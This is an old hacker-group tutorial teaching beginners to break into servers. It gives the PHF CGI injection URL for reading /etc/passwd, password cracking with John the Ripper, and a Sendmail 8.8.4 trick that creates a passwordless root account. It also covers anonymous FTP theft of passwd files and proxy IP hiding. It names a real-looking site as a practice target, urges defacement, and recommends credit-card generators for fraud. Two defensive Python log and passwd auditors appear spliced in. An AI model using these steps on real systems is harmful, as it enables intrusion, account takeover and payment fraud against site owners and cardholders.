
Hi and welcome to P.I.M.C newbie hackers school.
First you must remember these:
* Exploit: a bug in a program that can be used to obtain something
* PASSWD File: the userbase file of unix/linux, this file is always located at /etc/passwd
* Shadow: type of encryption to the PASSWD file
* Shadowed Passwd: A PASSWD file that instead of the normal encryption has a shadow encryption -> '*' or 'x' or '!' in the password slot, a Shadowed PASSWD file = FAKE
* Shadow File: the file that contains the real passwords for the users in the Shadowed Passwd, default location: /etc/shadow
* Proxy: a server that can be used to disguise the hacker's IP address
* Wingate: type of proxy server.
* Shell Account: username & password in the site's ftp
 

ok, now we'll start with some simple exploits

the PHF exploit
------------------
the PHF is a file that is located in the /cgi-bin directory of the site (most of the sites already removed it), this file has an exploit
that can obtain access to files, hackers usually use it to reach the real PASSWD file.
Example: how to activate the PHF exploit: http://www.target_site.com/phf?Qalias=x%0a/bin/cat%20/etc/passwd
this will give you a normal-encryption passwd file.
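
A defender-side check for the request shown above, as an added example that is not part of the original page: it scans web access logs for query strings that decode to a newline (the %0a in the PHF request) and reports whether the server answered 200. The log lines are constructed samples and the function name is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (Common Log Format); clients and times are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/1998:03:14:07 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1532
192.0.2.11 - - [12/Mar/1998:03:15:41 +0000] "GET /index.html HTTP/1.0" 200 4096
192.0.2.12 - - [12/Mar/1998:03:16:02 +0000] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 310
192.0.2.13 - - [12/Mar/1998:03:17:55 +0000] "GET /cgi-bin/search?q=a%0Ab HTTP/1.0" 404 0
"""

# client, request target and status code from one CLF line
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3}) ')

def find_newline_injection(log_text):
    """Return one finding per request whose decoded query string contains CR or LF."""
    findings = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue  # not a request line we understand
        client, target, status = m.groups()
        path, _, query = target.partition("?")
        decoded = unquote(query)  # %0a -> "\n", %20 -> " "
        if "\n" not in decoded and "\r" not in decoded:
            continue  # ordinary query, e.g. phf?Qname=smith
        findings.append({
            "client": client,
            "script": path.rsplit("/", 1)[-1],
            # everything after the first line break is what the CGI's shell would see
            "payload": decoded.splitlines()[1:],
            "served": status == "200",  # 200 means the script exists and ran
        })
    return findings

if __name__ == "__main__":
    for f in find_newline_injection(SAMPLE_LOG):
        print(f)
```

The check generalizes past phf: any CGI request with an encoded line break in its query is flagged, and "served" separates scripts that are still installed from probes that got a 404.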
 

Welcome to training mission I , your mission is to get the passwd file of  WWW.AFP.ORG , good luck.
what are you waiting for?! , go hack it!!!
ok, after you succeeded training mission I , you need to leech the passwords from the PASSWD file,
to do this you need to get a program called John The Ripper, after you got it, use this command line to leech
the passwords from the PASSWD file:
john -pwfile:PASSWD -stdin , this will take a lot of time so i suggest you leave your computer all night long to hack it.
if john found a password he will write something like this:

the_password_he_find         (the_username_for_the_password)

well, congratulations, you finished your first exploit!!
 

SENDMAIL 8.8.4 exploit
-----------------------------
The SENDMAIL 8.8.4 is a program that is installed on Port 25 of the server (you can check if it exists on the target site by
running this through Windows95: 'telnet www.target.com 25' , if in the first line that appears there is a 'SENDMAIL 8.8.4',
that means that the program is installed on the server, now after you checked if the program is installed, you MUST have
a shell account on the server (try to 'buy' one with a credit card generator) , after you get the shell account you need 2 do
this:  first get in port 23 on the server - telnet www.target.com 23 , this is the 'telnet' port, now when it will ask for
username type your username (from the shell you bought) , and after it type your password, now, if it will give you
a command prompt, you're in!! , now you need to type this:
 'ln /etc/passwd /var/tmp/dead.letter'
ok, after you type it get out of port 23 and get into port 25 again,
now , send this messy:



mail from: bullshit@unexisten_host.com
rcpt to: bullshit@unexisten_host.com
data
pimc::0:0:leet shit:/root:/bin/bash
.
quit


after you sent this messy, go to Port23 , then in the username type 'PIMC' , and in the password just press enter,
and now you are in the server, with your own SUPERUSER shell account, you can do whatever you want!!!
(delete stuff - lame/change the site and write credits 2 yourself/upload shit/what-ever)
Training mission II , find a site that is using SENDMAIL 8.8.5 and get a SUPERUSER there
what are you waiting for?!
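
What an administrator can check for after the steps above, as an added example that is not part of the original page: it audits passwd-format text for the kind of entry appended here (empty password slot, UID 0 under a name other than root), for hashes left in the world-readable file instead of a shadow placeholder, and for a second hard link to the file. The sample file is constructed and the function names are assumptions.

```python
import os

# Constructed sample: a shadowed passwd file plus the line from the text above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/false
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:abCONSTRUCTED:1001:1001:Bob:/home/bob:/bin/sh
pimc::0:0:leet shit:/root:/bin/bash
"""

def audit_passwd(text):
    """Return (username, issue) pairs for risky entries in passwd-format text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append((f"line {lineno}", "malformed"))
            continue
        name, pw, uid = fields[0], fields[1], int(fields[2])
        if pw == "":
            findings.append((name, "empty-password"))   # login needs no password
        elif pw != "x" and pw[0] not in "*!":
            findings.append((name, "hash-in-passwd"))   # hash readable by every user
        if uid == 0 and name != "root":
            findings.append((name, "extra-uid0"))       # second superuser account
    return findings

def has_extra_hard_links(path):
    """True if the file has more than one name, e.g. an ln'd copy in /var/tmp."""
    return os.stat(path).st_nlink > 1

if __name__ == "__main__":
    for who, issue in audit_passwd(SAMPLE_PASSWD):
        print(f"{who}: {issue}")
    if os.path.exists("/etc/passwd"):
        print("/etc/passwd has extra hard links:",
              has_extra_hard_links("/etc/passwd"))
```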
 

The Simplest Hacking Method
----------------------------------
Get into the site (port 21) , then write these commands:
* User anonymous
* Pass [email protected]
now you are supposed to be on the server, now type these commands:
* cmd /etc
* retr passwd
now you are downloading the passwd file, now you need to check if it is shadowed, if it's not then just crack it with
cracker jack...
 
 

How to disguise your IP address
------------------------------------
these are disguise instructions for use in Windows95, here is what you do:
Press on Start -> config -> control panel
now when you are in the control panel, press on Internet, when the window appears,  press on 'Connections' , now
you will see a 'Proxy server' box, in the box, mark 'x' on the 'connect through a proxy server' , now press on the settings button, now,
mark with 'x' the 'Use the same proxy server for all protocols'
now, type in the HTTP box the proxy server and in its PORT box type 8080 , now press on OK and all the places you will connect to will get
the Proxy's IP address.
here is a proxy you can use:
bcproxy.ac.il:8080 - Israeli university

 

Ok, now im a medium hacker, but my internet bill is HHUUGGEE , what should i do?!
--------------------------------------------------------------------------------------------------
ok, now you gotta do yourself a Free Internet Account (FIA) , the thing that i will tell u now will work on most of the
world's countries ,  go into www.ibm.net, now press on Registration Center , now go down the screen and search for
'Online Registration Process' , after you press on it, it will obtain you access to the userbase file (to add a user)
first, select your country (it must be NOT fake) , now everything you will write is totally fake!! (except the credit card - there
you gotta use a credit card generator)  ,  after your done ask someone for the IBM number in your country and just call them
with your Internet connection program (or download one from their site) , welp , free internet =)  ,  gotta go <'ya

 
 
 
 
 
 
 
CONGRATULATIONS!!! YOU ARE NOT A NEWBIE ANYMORE!!!
YOU HACKED TWO SITES, YOU ARE IN A GOOD PLACE IN THE MIDDLE!
Advice for more learning: scan for .c scripts & more exploits.
this area has been written by aCCESS^dEN|ED
Leader of the P.I.M.C group